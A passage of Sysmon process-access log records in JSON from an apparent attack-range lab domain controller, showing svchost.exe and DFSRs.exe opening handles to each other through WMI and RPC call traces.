C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.958","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1844,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.958\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.958","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1845,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.958\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.958","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1846,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.974\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nSourceProcessId: 2916\r\nSourceThreadId: 3428\r\nSourceImage: C:\\Windows\\system32\\DFSRs.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\wmidcom.dll+58a6|C:\\Windows\\system32\\wmidcom.dll+5464|C:\\Windows\\system32\\wmidcom.dll+5495|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.974","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","SourceProcessId":"2916","SourceThreadId":"3428","SourceImage":"C:\\Windows\\system32\\DFSRs.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\wmidcom.dll+58a6|C:\\Windows\\system32\\wmidcom.dll+5464|C:\\Windows\\system32\\wmidcom.dll+5495|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1847,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.974\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.974","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1848,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.974\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.974","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1849,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.974\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.974","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1850,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.974\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 